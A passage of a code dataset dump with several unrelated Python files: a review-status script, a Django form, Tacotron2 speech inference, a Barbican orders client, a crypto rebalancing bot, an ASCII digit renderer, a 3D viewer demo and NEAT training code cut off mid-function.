paper_status[paper_num]\n count = paper_data['count']\n paper_data['percent'] = 0\n if count:\n paper_data['percent'] = 100 * paper_data['reviewed'] / count\n\n# sort on % complete (doesn't like being sorted in place)\npaper_status_sorted = sorted(paper_status, key=lambda x: (paper_status[x]['percent'], x))\n\n\n# print results\n# csv\nwith open(file_name, 'wb') as outfile:\n csvwriter = csv.writer(outfile, delimiter=',')\n row = []\n row.append(\"Paper Number\")\n row.append(\"Title\")\n row.append(\"%Review Complete\")\n row.append(\"Reviewer Name\")\n row.append(\"Review Rating\")\n row.append(\"Review Confidence\")\n csvwriter.writerow(row)\n for paper_num in paper_status_sorted:\n reviewers = reviewers_by_paper[paper_num]\n for reviewer, note in reviewers.iteritems():\n row = []\n row.append(paper_num)\n row.append(paper_status[paper_num]['title'])\n row.append(paper_status[paper_num]['percent'])\n row.append(reviewer.encode('utf-8'))\n if note:\n row.append(get_score('rating'))\n row.append(get_score('confidence'))\n else:\n row.append(0)\n row.append(0)\n 
csvwriter.writerow(row)\n","repo_name":"openreview/openreview-scripts","sub_path":"venues/ICLR.cc/2017/conference/python/get-all-paper-status.py","file_name":"get-all-paper-status.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"27534736068","text":"from django import forms\r\nfrom .models import Cases\r\n\r\nclass CasesForm(forms.ModelForm):\r\n\t\r\n\tdeadline =forms.DateField(widget=forms.TextInput(\r\n\t\tattrs={'type': 'date'}))\r\n\tfecha_cotizacion =forms.DateField(widget=forms.TextInput(\r\n\t\tattrs={'type': 'date'}))\r\n\t\r\n\t\r\n\tclass Meta:\r\n\t\t\r\n\t\tmodel = Cases\r\n\t\tlabels={\"text\":\"Comentarios\"}\r\n\t\traw_id_fields = (\"status\",)\r\n\t\tfields = ('referencia', 'cliente','mv', 'deadline', 'status', 'numero_cotizacion','fecha_cotizacion','monto_cotizacion','ubicacion', 'text') \r\n","repo_name":"asdrubaldiaz/logistica","sub_path":"followup/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40333608023","text":"from Tacotron2.text import text_to_sequence\nimport models\nimport torch\nimport argparse\nimport numpy as np\nfrom scipy.io.wavfile import write\nimport pickle\nimport sys\nimport os\nimport math\nimport time\nfrom dllogger.logger import LOGGER\nimport dllogger.logger as dllg\nfrom dllogger.autologging import log_hardware, log_args\nfrom torch.utils.data import Dataset\n# from apex import amp\n\nfrom waveglow.denoiser import Denoiser\n\ndef parse_args(parser):\n \"\"\"\n Parse commandline arguments.\n \"\"\"\n parser.add_argument('-i', '--input', type=str, default= 'data/input/Demo.pickle',\n help='full path to the input text (phareses separated by new line)')\n parser.add_argument('-o', '--output', default= 'data/output', #'\n help='output folder to save audio (file per phrase)')\n parser.add_argument('--tacotron2', type=str, default='models/tacotron2_statedict.pt',\n help='full path to the Tacotron2 model checkpoint file')\n parser.add_argument('--waveglow', type=str,default= 'models/waveglow_256channels.pt',\n help='full path to the WaveGlow model checkpoint file')\n parser.add_argument('-s', '--sigma-infer', default=0.9, type=float)\n parser.add_argument('-d', '--denoising-strength', default=0.01, type=float)\n parser.add_argument('-sr', '--sampling-rate', default=22050, type=int,\n help='Sampling rate')\n parser.add_argument('--amp-run', default = False,\n help='inference with AMP')\n parser.add_argument('--log-file', type=str, default='nvlog.json',\n help='Filename for logging')\n parser.add_argument('--include-warmup', default= False,\n help='Include warmup')\n parser.add_argument('--stft-hop-length', type=int, default=256,\n help='STFT hop length for estimating audio length from mel size')\n\n\n return parser\n\n\ndef load_checkpoint(checkpoint_path, model_name):\n assert os.path.isfile(checkpoint_path)\n\n print(\"Loading checkpoint '{}'\".format(checkpoint_path))\n checkpoint_dict = torch.load(checkpoint_path, map_location='cpu')\n model.load_state_dict(checkpoint_dict['state_dict'])\n print(\"Loaded '{}' checkpoint '{}'\" .format(model_name, checkpoint_path))\n return model\n\n\ndef checkpoint_from_distributed(state_dict):\n \"\"\"\n Checks whether checkpoint was generated by DistributedDataParallel. 
DDP\n wraps model in additional \"module.\", it needs to be unwrapped for single\n GPU inference.\n :param state_dict: model's state dict\n \"\"\"\n ret = False\n for key, _ in state_dict.items():\n if key.find('module.') != -1:\n ret = True\n break\n return ret\n\n\ndef unwrap_distributed(state_dict):\n \"\"\"\n Unwraps model from DistributedDataParallel.\n DDP wraps model in additional \"module.\", it needs to be removed for single\n GPU inference.\n :param state_dict: model's state dict\n \"\"\"\n new_state_dict = {}\n for key, value in state_dict.items():\n new_key = key.replace('module.', '')\n new_state_dict[new_key] = value\n return new_state_dict\n\n\ndef load_and_setup_model(model_name, parser, checkpoint, amp_run):\n model_parser = models.parse_model_args(model_name, parser, add_help=False)\n model_args, _ = model_parser.parse_known_args()\n\n model_config = models.get_model_config(model_name, model_args)\n model = models.get_model(model_name, model_config, to_cuda=True)\n\n if checkpoint is not None:\n \n state_dict = torch.load(checkpoint)['state_dict']\n # if checkpoint_from_distributed(state_dict):\n # state_dict = unwrap_distributed(state_dict)\n\n model.load_state_dict(state_dict)\n\n if model_name == \"WaveGlow\":\n model = model.remove_weightnorm(model)\n\n model.eval()\n\n if amp_run:\n model, _ = amp.initialize(model, [], opt_level=\"O3\")\n\n return model\n\n\n# taken from tacotron2/data_function.py:TextMelCollate.__call__\ndef pad_sequences(batch):\n # Right zero-pad all one-hot text sequences to max input length\n input_lengths, ids_sorted_decreasing = torch.sort(\n torch.LongTensor([len(x) for x in batch]),\n dim=0, descending=True)\n max_input_len = input_lengths[0]\n\n text_padded = torch.LongTensor(len(batch), max_input_len)\n text_padded.zero_()\n for i in range(len(ids_sorted_decreasing)):\n text = batch[ids_sorted_decreasing[i]]\n text_padded[i, :text.size(0)] = text\n\n return text_padded, input_lengths\n\n\ndef prepare_input_sequence(texts):\n\n d = []\n for i,text in enumerate(texts):\n d.append(torch.IntTensor(\n text_to_sequence(text, ['english_cleaners'])[:]))\n\n text_padded, input_lengths = pad_sequences(d)\n if torch.cuda.is_available():\n text_padded = torch.autograd.Variable(text_padded).cuda().long()\n input_lengths = torch.autograd.Variable(input_lengths).cuda().long()\n else:\n text_padded = torch.autograd.Variable(text_padded).long()\n input_lengths = torch.autograd.Variable(input_lengths).long()\n\n return text_padded, input_lengths\n\n\nclass MeasureTime():\n def __init__(self, measurements, key):\n self.measurements = measurements\n self.key = key\n\n def __enter__(self):\n torch.cuda.synchronize()\n self.t0 = time.perf_counter()\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n torch.cuda.synchronize()\n self.measurements[self.key] = time.perf_counter() - self.t0\n\n\ndef collate_fn(batch): \n tests,keys = zip(*batch)\n input_lengths, ids_sorted_decreasing = torch.sort(\n torch.LongTensor([len(x) for x in tests]),\n \n dim=0, descending=True)\n max_input_len = input_lengths[0]\n\n text_padded = torch.LongTensor(len(tests), max_input_len)\n index = torch.LongTensor(keys)[ids_sorted_decreasing]\n text_padded.zero_()\n for i in range(len(ids_sorted_decreasing)):\n text = tests[ids_sorted_decreasing[i]]\n \n text_padded[i, :text.size(0)] = text\n \n return text_padded, input_lengths, index\n\nclass dataloader(torch.utils.data.Dataset):\n \"\"\"\n 1) loads audio,text pairs\n 2) normalizes text and converts them to sequences of one-hot 
vectors\n 3) computes mel-spectrograms from audio files.\n \"\"\"\n def __init__(self,args):\n with open(args.input,'rb') as f:\n total = pickle.load(f)\n self.texts = total #[:1100] \n print(\"===============================len of texts\",len(self.texts))\n self.keys = np.arange(start=0,stop=len(total),step=1)\n # with open('save_audiofiles.pickle','rb') as f1:\n # self.save_filname = pickle.laod(f1)\n \n\n \n def get_text(self, text):\n text_norm = torch.IntTensor(text_to_sequence(text, ['english_cleaners']))\n return text_norm\n\n def __getitem__(self, index):\n \n # Rindx = 0-index-1\n # return self.get_text(self.texts[Rindx]), self.keys[Rindx]\n return self.get_text(self.texts[index]), self.keys[index]\n\n def __len__(self):\n return len(self.texts)\n\n\ndef main():\n \"\"\"\n Launches text to speech (inference).\n Inference is executed on a single GPU.\n \"\"\"\n parser = argparse.ArgumentParser(\n description='PyTorch Tacotron 2 Inference')\n parser = parse_args(parser)\n args, _ = parser.parse_known_args()\n\n # LOGGER.set_model_name(\"Tacotron2_PyT\")\n # LOGGER.set_backends([\n # dllg.StdOutBackend(log_file=None,\n # logging_scope=dllg.TRAIN_ITER_SCOPE, iteration_interval=1),\n # dllg.JsonBackend(log_file=args.log_file,\n # logging_scope=dllg.TRAIN_ITER_SCOPE, iteration_interval=1)\n # ])\n # LOGGER.register_metric(\"tacotron2_items_per_sec\", metric_scope=dllg.TRAIN_ITER_SCOPE)\n # LOGGER.register_metric(\"tacotron2_latency\", metric_scope=dllg.TRAIN_ITER_SCOPE)\n # LOGGER.register_metric(\"waveglow_items_per_sec\", metric_scope=dllg.TRAIN_ITER_SCOPE)\n # LOGGER.register_metric(\"waveglow_latency\", metric_scope=dllg.TRAIN_ITER_SCOPE)\n # LOGGER.register_metric(\"latency\", metric_scope=dllg.TRAIN_ITER_SCOPE)\n\n # log_hardware()\n # log_args(args)\n\n tacotron2 = load_and_setup_model('Tacotron2', parser, args.tacotron2,\n args.amp_run)\n\n waveglow = torch.load(args.waveglow)['model']\n # waveglow = load_and_setup_model('WaveGlow', parser, args.waveglow,\n # args.amp_run)\n denoiser = Denoiser(waveglow).cuda()\n\n data_loader = torch.utils.data.DataLoader(dataloader(args), 5, shuffle=False, collate_fn = collate_fn) \n\n measurements = {}\n img_num = 0\n k = 0\n for i, data in enumerate(data_loader):\n try: \n new_num = math.ceil((i+1)/2) \n sequences_padded, input_lengths, keys = data\n if torch.cuda.is_available():\n sequences_padded = torch.autograd.Variable(sequences_padded).cuda().long()\n input_lengths = torch.autograd.Variable(input_lengths).cuda().long()\n else:\n sequences_padded = torch.autograd.Variable(sequences_padded).long()\n input_lengths = torch.autograd.Variable(input_lengths).long()\n\n\n\n with torch.no_grad(), MeasureTime(measurements, \"tacotron2_time\"):\n _, mel, _, _, mel_lengths = tacotron2.infer(sequences_padded, input_lengths)\n\n with torch.no_grad(), MeasureTime(measurements, \"waveglow_time\"):\n audios = waveglow.infer(mel, sigma=args.sigma_infer)\n audios = audios.float()\n audios = denoiser(audios, strength=args.denoising_strength).squeeze(1)\n\n\n\n\n # tacotron2_infer_perf = mel.size(0)*mel.size(2)/measurements['tacotron2_time']\n # waveglow_infer_perf = audios.size(0)*audios.size(1)/measurements['waveglow_time']\n\n # LOGGER.log(key=\"tacotron2_items_per_sec\", value=tacotron2_infer_perf)\n # LOGGER.log(key=\"tacotron2_latency\", value=measurements['tacotron2_time'])\n # LOGGER.log(key=\"waveglow_items_per_sec\", value=waveglow_infer_perf)\n # LOGGER.log(key=\"waveglow_latency\", value=measurements['waveglow_time'])\n # 
LOGGER.log(key=\"latency\", value=(measurements['tacotron2_time']+\n # measurements['waveglow_time']))\n\n for j, audio in enumerate(audios):\n k+=1\n key = keys[j]\n audio = audio[:mel_lengths[j]*args.stft_hop_length]\n audio = audio/torch.max(torch.abs(audio))\n # audio_path = args.output + \"/audio_\"+str(j)+'-'+str(i)+\".wav\"\n audio_dir = args.output\n audio_path = str(key) + '.wav' \n save_path = os.path.join(audio_dir,audio_path)\n write(save_path, args.sampling_rate, audio.cpu().numpy())\n\n info = 'saved the %i-th audios\\n'%(k) \n \n except:\n pass\n\n # LOGGER.iteration_stop()\n # LOGGER.finish()\n\nif __name__ == '__main__':\n main()\n","repo_name":"xinshengwang/Tacotron2_batch_inference","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":11236,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"71307212907","text":"from yandex_testing_lesson import strip_punctuation_ru\n\n\ndef good_strip_punct(line):\n text = ''.join(x for x in line if x.isalpha() or x.isspace()\n or x == '-').replace(' - ', ' ')\n return ' '.join(text.split())\n\n\nif __name__ == '__main__':\n tests = [\"Мама мыла раму. Долго! \",\n \"Кое-где кое-кто кое-что не решил...\"]\n flag = True\n try:\n for test in tests:\n assert strip_punctuation_ru(test) == good_strip_punct(test)\n except AssertionError as e:\n flag = False\n\n print('YES' if flag else 'NO')\n","repo_name":"Lem-a-k/MyTestGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24644460094","text":"from cloudcafe.cloudkeep.barbican.client import BarbicanRestClient\nfrom cloudcafe.cloudkeep.barbican.secrets.models.secret import Secret\nfrom cloudcafe.cloudkeep.barbican.orders.models.order \\\n import Order, OrderRef, OrderGroup\n\n\nclass OrdersClient(BarbicanRestClient):\n\n def __init__(self, url, api_version, token=None,\n serialize_format=None, deserialize_format=None):\n super(OrdersClient, self).__init__(\n token=token, serialize_format=serialize_format,\n deserialize_format=deserialize_format)\n self.url = url\n self.api_version = api_version\n\n def _get_base_url(self):\n return '{base}/{api_version}/orders'.format(\n base=self.url,\n api_version=self.api_version)\n\n def _get_order_url(self, order_id):\n return '{base}/{order_id}'.format(base=self._get_base_url(),\n order_id=order_id)\n\n def create_order(self, name, payload_content_type, algorithm,\n bit_length, mode, expiration, headers=None):\n \"\"\"\n POST http://.../v1/orders/{order_uuid}\n Creates an order to generate a secret\n \"\"\"\n remote_url = self._get_base_url()\n secret = Secret(name=name,\n payload_content_type=payload_content_type,\n expiration=expiration,\n algorithm=algorithm,\n bit_length=bit_length,\n mode=mode)\n req_obj = Order(secret=secret)\n\n resp = self.request('POST', remote_url, request_entity=req_obj,\n response_entity_type=OrderRef, headers=headers)\n return resp\n\n def create_order_w_payload(self, name, payload_content_type, algorithm,\n bit_length, mode, expiration, payload):\n \"\"\"\n POST http://.../v1/orders/{order_uuid}\n Creates an order to generate a secret with plain text. 
This is\n separate from the create_order method because it is used for\n negative testing only and is expected to fail.\n \"\"\"\n remote_url = self._get_base_url()\n secret = Secret(name=name,\n payload_content_type=payload_content_type,\n expiration=expiration,\n algorithm=algorithm,\n bit_length=bit_length,\n mode=mode,\n payload=payload)\n req_obj = Order(secret=secret)\n\n resp = self.request('POST', remote_url, request_entity=req_obj,\n response_entity_type=OrderRef)\n return resp\n\n def get_order(self, order_id=None, ref=None):\n \"\"\"\n GET http://.../v1/orders/{order_uuid}\n Retrieves an order\n \"\"\"\n remote_url = ref or self._get_order_url(order_id)\n return self.request('GET', remote_url, response_entity_type=Order)\n\n def delete_order(self, order_id):\n \"\"\"\n DELETE http://.../v1/orders/{order_uuid}\n Cancels an order\n \"\"\"\n return self.request('DELETE', self._get_order_url(order_id))\n\n def get_orders(self, limit=None, offset=None, ref=None):\n \"\"\"\n GET http://.../v1/orders?limit={limit}&offset={offset} or {ref}\n Gets a list of orders\n \"\"\"\n remote_url = ref or self._get_base_url()\n resp = self.request('GET', remote_url,\n params={'limit': limit, 'offset': offset},\n response_entity_type=OrderGroup)\n return resp\n\n def update_order(self, order_id, payload_content_type=None, data=None):\n \"\"\"\n PUT http://.../v1/orders/{order_uuid}\n Attempts to update order similar to how secrets are updated.\n \"\"\"\n remote_url = self._get_order_url(order_id)\n headers = {'Content-Type': payload_content_type}\n resp = self.request('PUT', remote_url, headers=headers,\n data=data)\n return resp\n","repo_name":"jcourtois/rpc9_cloudcafe","sub_path":"cloudcafe/cloudkeep/barbican/orders/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32234297787","text":"import ccxt\r\nimport time\r\nimport os\r\nimport sys\r\n\r\nsys.path.insert(1, '../src')\r\nimport func_get\r\nimport func_update\r\nimport func_rebalance\r\n\r\n\r\ndef run_bot(config_system, config_params_path, last_loop_path, transfer_path, open_orders_df_path, transactions_df_path, queue_df_path, profit_df_path, cash_flow_df_path):\r\n bot_name = os.path.basename(os.getcwd())\r\n exchange = func_get.get_exchange(config_system)\r\n config_params = func_get.get_json(config_params_path)\r\n \r\n end_date_flag, prev_date = func_get.check_end_date(cash_flow_df_path, transactions_df_path)\r\n\r\n if end_date_flag:\r\n func_rebalance.update_end_date_rebalance(prev_date, exchange, config_system, config_params, config_params_path, last_loop_path, transfer_path, profit_df_path, cash_flow_df_path)\r\n\r\n rebalance_flag = func_rebalance.get_rebalance_flag(exchange, config_params, last_loop_path, transfer_path, profit_df_path, cash_flow_df_path)\r\n\r\n if rebalance_flag:\r\n func_rebalance.clear_orders_rebalance(exchange, bot_name, config_system, config_params, last_loop_path, transfer_path, open_orders_df_path, transactions_df_path, queue_df_path, profit_df_path, cash_flow_df_path, resend_flag=False)\r\n \r\n for symbol in config_params['symbol']:\r\n func_rebalance.rebalance(exchange, symbol, config_params, last_loop_path, transfer_path, open_orders_df_path, profit_df_path, cash_flow_df_path)\r\n \r\n func_rebalance.update_sequence_loop(config_params, last_loop_path)\r\n\r\n cash = func_get.get_quote_currency_value(exchange, symbol)\r\n print(f\"Cash: {cash} USD\")\r\n else:\r\n 
func_rebalance.clear_orders_rebalance(exchange, bot_name, config_system, config_params, last_loop_path, transfer_path, open_orders_df_path, transactions_df_path, queue_df_path, profit_df_path, cash_flow_df_path, resend_flag=True)\r\n\r\n func_update.update_timestamp(last_loop_path)\r\n\r\n timestamp = func_get.get_time()\r\n print(f\"Time: {timestamp}\")\r\n\r\n last_loop = func_get.get_json(last_loop_path)\r\n print(f\"Next rebalance: {last_loop['next_rebalance_timestamp']}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n config_system_path = 'config_system.json'\r\n config_params_path = 'config_params.json'\r\n last_loop_path = 'last_loop.json'\r\n transfer_path = 'transfer.json'\r\n open_orders_df_path = 'open_orders.csv'\r\n transactions_df_path = 'transactions.csv'\r\n queue_df_path = 'queue_{}.csv'\r\n profit_df_path = 'profit.csv'\r\n error_log_df_path = 'error_log.csv'\r\n cash_flow_df_path = 'cash_flow.csv'\r\n\r\n while True:\r\n config_system = func_get.get_json(config_system_path)\r\n idle_loop = config_system['idle_loop']\r\n\r\n if config_system['run_flag'] == 1:\r\n print(\"Start loop\")\r\n \r\n try:\r\n run_bot(config_system, config_params_path, last_loop_path, transfer_path, open_orders_df_path, transactions_df_path, queue_df_path, profit_df_path, cash_flow_df_path)\r\n except (ccxt.RequestTimeout, ccxt.NetworkError, ccxt.ExchangeError):\r\n func_update.append_error_log('ConnectionError', error_log_df_path)\r\n print('No connection: Skip the loop')\r\n \r\n print(\"End loop\")\r\n print(f\"Wait {idle_loop} seconds\")\r\n else:\r\n print(\"Stop process\")\r\n func_rebalance.reset_order_loop(last_loop_path)\r\n \r\n time.sleep(idle_loop)","repo_name":"neozan/puresed-bot","sub_path":"bot_rebalance/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"23429640045","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 9 15:09:24 2020\n\n@author: fs19144\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\ndef read_data():\n survey = pd.read_csv(\"data/survey.csv\")\n \n # Remove columns with any NaNs\n any_nans = np.repeat(False, np.shape(survey)[0])\n for i in [1, 2, 4]:\n any_nans = any_nans ^ np.isnan(survey.iloc[:,i]) \n survey = survey.loc[~any_nans, :]\n \n # Remove letters that aren't in the alphabet\n upper_letters = [chr(x) for x in range(65, 91)]\n survey.iloc[:, 3] = survey.iloc[:, 3].str.upper()\n letters_in = np.repeat(False, np.shape(survey)[0])\n for i in range(np.shape(survey)[0]):\n letters_in[i] = survey.iloc[i, 3] in upper_letters\n survey = survey.loc[letters_in, :]\n print(\"{} ({}%) people picked a letter that isn't in the alphabet\".format(sum(~letters_in), np.round(sum(~letters_in)/len(~letters_in), 4)*100 ))\n \n # Remove numbers which are decimals\n decimal_inputs = np.repeat(False, np.shape(survey)[0])\n for i in [1, 2, 4]:\n decimal_inputs = decimal_inputs ^ np.round(survey.iloc[:,i]) - survey.iloc[:,i] > 0\n survey = survey.loc[~decimal_inputs, :]\n print(\"{} ({}%) people picked at least one number as a decimal\".format(sum(decimal_inputs), np.round(sum(decimal_inputs)/len(decimal_inputs), 4)*100 ))\n\n return survey","repo_name":"dannyjameswilliams/randomchoices","sub_path":"code/data_funs.py","file_name":"data_funs.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9421984220","text":"# 
Ovec_lib.py\n# =================================================\n'''\nOverview\n========\n\nThe method \"number_matrix\" shows a number in a \n“Console-style” output of one char per pixel. The \nfunction takes an integer and returns eight rows of chars \nwhich represent EXACTLY three figures. When the size of the\nnumber is less than 100 it is padded with leading zeros. \nWhen the size is more than 999, it only shows the FIRST \nthree figures. Negative numbers have EXACTLY 2 figures -\nsince the first is the leading minus.\n\n== Examples ==  -7 ==> -07  72 ==> 072  5923 ==> 592\n\nAlgorithm\n=========\nThe dictionary provides 8*5-pixel patterns for the 11 chars\nit supports; these are the “minus” and digits (0 to 9).\nAllowing 2 pixels in between each char gives totals:\n\n   WIDTH: (5+2) + (5+2) +5 = 17 chars\n   HEIGHT: 8 chars\n'''\n# =================================================\n'''\n First Section - Pixel Dictionary \n ================\n + - and digits 0 to 9\n'''\n# =================================================\n\ndef dic_pixel_font():\n \n return {'1':[' 11',\n ' 1111',\n '11 11',\n ' 11',\n ' 11',\n ' 11',\n ' 11',\n ' 11'],\n \n '2':[' 222 ',\n '22 22',\n '2 22',\n ' 22',\n ' 22',\n ' 22 ',\n ' 22 ',\n '22222'],\n \n '3':[' 333 ',\n '33 33',\n '3 33',\n ' 33',\n ' 3333',\n ' 33', \n '33 33',\n ' 333 '],\n \n '4':[' 44 ',\n ' 44 ',\n '44 ',\n '44 44',\n '44 44',\n '44444',\n ' 44',\n ' 44',],\n \n '5':['55555',\n '55 ',\n '55 ',\n '55 ',\n ' 555',\n ' 5', \n ' 5',\n '5555 '],\n \n '6':[' 66',\n ' 66 ',\n '.66 ',\n '6666 ',\n '66666',\n '6 66',\n '6 66',\n '66666'],\n \n '7':['77777',\n ' 77',\n ' 7 ',\n ' 77 ',\n ' 7 ',\n ' 77 ', \n ' 7 ',\n '77 '],\n \n \n '8':[' 888 ',\n '8 8',\n '8 8',\n ' 888 ',\n ' 888 ',\n '8 8',\n '8 8', \n ' 888 '],\n \n '9':['99999',\n '9 99',\n '9 99',\n '9 99',\n ' 9999',\n ' 99 ',\n ' 99 ',\n '99 '],\n \n '0':[' 000 ',\n '00 00',\n '0 0',\n '0 0',\n '0 0',\n '0 0', \n '00 00',\n ' 000 '],\n \n '-':[' ',\n ' ',\n ' ',\n ' ',\n '#####',\n ' ',\n ' ',\n ' '], \n \n '+':[' ',\n ' ',\n ' ## ',\n ' ## ',\n '#####',\n ' ## ',\n ' ## ',\n ' '] \n \n }\n \n# =================================================\n'''\n Second Section - Pixel Matrix\n ============\n Represents the orignal number as three figures\n forming a matrix of characters 8 rows * 17 cols\n'''\n# =================================================\n \ndef each_pixel_line(row,fig_trio):\n spacer,d_xo=2*\" \",dic_pixel_font()\n return str(d_xo[fig_trio[0]][row]+spacer+ \\\n d_xo[fig_trio[1]][row]+spacer+ \\\n d_xo[fig_trio[2]][row])\n \ndef pixel_matrix(fig_trio):\n return [each_pixel_line(r,fig_trio) for r in range(8) ]\n \ndef number_matrix(number,limit_of2=False):\n return pixel_matrix(made_into3figs(number, \\\n limit_of2))\n \n\ndef reduce_suffix(numx,maintain_2=True):\n base,num=1000,abs(float(numx))\n if maintain_2 : base=100\n if numx<0: base=100\n while num>=base: num/=10\n return int(round(num))\n \n \ndef made_into3figs(numx,limit_of2):\n see_digit,prefix=2,\"+\"\n if limit_of2==False and numx>0:\n see_digit,prefix=3,\"\"\n if numx<0: prefix=\"-\"\n rhs=\"000000\"+str(reduce_suffix(numx, \\\n maintain_2=limit_of2))\n return prefix+rhs[-see_digit:]\n \n# =================================================\n'''\n Main Section - The \"public\" function\n There are three return values:\n \n picture_right is boolean: \n True - the image goes to the right of the paper\n False - the image goes to the left of the paper\n \n number_matrix produced for x display\n number_matrix produced for 
y display\n'''\n# =================================================\n\ndef build_labels(coords): \n xprod,yprod,_ignore=coords\n \n print(\" * * * Debug ==> Values look like\",\n int(xprod),\",\",int(yprod))\n \n signs_required = bool( xprod<0 or yprod<0 ) \n \n picture_right= bool(xprod >= 0) \n return picture_right, \\\n number_matrix(xprod,limit_of2=signs_required),\\\n number_matrix(yprod,limit_of2=signs_required) \n \n# =================================================\n'''\n Final Section - Testing when run as stand-alone\n'''\n# =================================================\ndef num_pattern_basictest(): \n \n print(\"*** Should be 258 **\")\n print(\"abcdefghij123456789\")\n number=25775\n plate=number_matrix(number)\n for pl in plate:print (pl)\n print(\"abcdefghij123456789\")\n \n print(\"*** Should be +51 **\")\n print(\"abcdefghij123456789\")\n number=512\n plate=number_matrix(number,limit_of2=True)\n for pl in plate:print (pl)\n print(\"abcdefghij123456789\")\n \n print(\"*** Should be 091 **\")\n print(\"abcdefghij123456789\")\n number=91\n plate=number_matrix(number)\n for pl in plate:print (pl)\n print(\"abcdefghij123456789\")\n \n print(\"*** Should be -03 **\")\n print(\"abcdefghij123456789\")\n number=-3\n plate=number_matrix(number)\n for pl in plate:print (pl)\n print(\"abcdefghij123456789\")\n \n# ===========================================\nif __name__ == \"__main__\":\n num_pattern_basictest()\n","repo_name":"LawrenceuSRprog/Python-Console-Triangle","sub_path":"Ovec_lib.py","file_name":"Ovec_lib.py","file_ext":"py","file_size_in_byte":6963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74182809706","text":"#!/usr/bin/python3\nimport numpy\nimport scipy.spatial\nfrom pyridescence import *\n\nviewer = guik.LightViewer.instance()\nviewer.enable_normal_buffer()\nviewer.set_screen_effect(glk.ScreenSpaceLighting())\n\nsub_viewer = viewer.sub_viewer('sub')\nsub_viewer.update_drawable('cube', glk.primitives.cube(), guik.Rainbow(scale=2.0, trans=(1.0, 0.0, 0.0)))\n\ncloud = numpy.random.randn(8192, 3)\ncloud = 5.0 * (cloud.T / numpy.linalg.norm(cloud, axis=1)).T\ncloud_buffer = glk.create_pointcloud_buffer(cloud)\nviewer.update_drawable('cloud', cloud_buffer, guik.Rainbow().add('point_scale', 2.0).make_transparent())\nviewer.update_drawable('icosahedron', glk.primitives.icosahedron(), guik.FlatColor(1.0, 0.5, 0.0, 0.5, scale=2.0))\n\ntime = 0.0\ntext = 'test'\nmodel_control = guik.ModelControl('model_control')\ndef callback():\n imgui.begin('ui', None, imgui.WindowFlags_AlwaysAutoResize)\n\n io = imgui.get_io()\n if not io.want_capture_mouse:\n if imgui.is_mouse_clicked(0):\n print('clicked')\n mouse_pos = imgui.get_mouse_pos()\n\n model_control.draw_gizmo_ui()\n model_control.draw_gizmo()\n setting, drawable = viewer.find_drawable('icosahedron')\n setting.add('model_matrix', model_control.model_matrix())\n\n global time\n imgui.separator()\n updated, time = imgui.drag_float('time', time, 0.1)\n if updated:\n viewer.append_text('time:%.3f' % time)\n setting, drawable = viewer.find_drawable('cloud')\n matrix = numpy.identity(4)\n matrix[:3, :3] = scipy.spatial.transform.Rotation.from_rotvec([0, 0, time]).as_matrix()\n setting.add('model_matrix', matrix)\n\n global text\n imgui.separator()\n _, text = imgui.input_text('text', text)\n\n imgui.separator()\n if imgui.button('close'):\n exit(0)\n\n imgui.end()\n\nviewer.register_ui_callback('callback', 
callback)\n\nviewer.spin()","repo_name":"koide3/iridescence","sub_path":"src/example/light_viewer.py","file_name":"light_viewer.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"37"} +{"seq_id":"23048380970","text":"from __future__ import print_function\nimport os\nimport neat\nfrom dask import visualize\nimport random\nfrom game import simulator\nimport pickle\nimport gzip\nimport copy\n\n\ndef eval_genomes(genome, config, challengers):\n\n\n genome.fitness = 0\n did_win_all = 0\n for i, c in enumerate(challengers):\n cur_simulator = simulator()\n cur_simulator.create_ai_fighters_from_gennomes([genome], config, challenger=c)\n did_cur_win = cur_simulator.run_full_simulation(c.sim_time)\n if did_cur_win:\n did_win_all += 1\n genome.fitness = genome.fitness + 100\n\n return did_win_all\n\nclass challenger(object):\n def __init__(self, genome, config, seed, sim_time):\n self.genome = genome\n self.config = config\n self.seed = seed\n self.sim_time = sim_time\n\ndef create_challenger(genome, config, sim_time):\n random.seed()\n return challenger(genome, config, random.random(), sim_time)\n\n\n\n\ndef population_run(self, fitness_function, num_genomes_per_run, n=None):\n \"\"\"\n Runs NEAT's genetic algorithm for at most n generations. If n\n is None, run until solution is found or extinction occurs.\n\n The user-provided fitness_function must take only two arguments:\n 1. The population as a list of (genome id, genome) tuples.\n 2. The current configuration object.\n\n The return value of the fitness function is ignored, but it must assign\n a Python float to the `fitness` member of each genome.\n\n The fitness function is free to maintain external state, perform\n evaluations in parallel, etc.\n\n It is assumed that fitness_function does not modify the list of genomes,\n the genomes themselves (apart from updating the fitness member),\n or the configuration object.\n \"\"\"\n\n if self.config.no_fitness_termination and (n is None):\n raise RuntimeError(\"Cannot have no generational limit with no fitness termination\")\n\n k = 0\n challengers = []\n\n while n is None or k < n:\n k += 1\n if k > 0 and (k+1) % 5 == 0:\n with open(f'challengers_{k}', 'wb+') as f:\n pickle.dump({'challengers':challengers, 'genomes':all_genomes}, f)\n self.reporters.start_generation(self.generation)\n\n # Evaluate all genomes using the user-provided function.\n 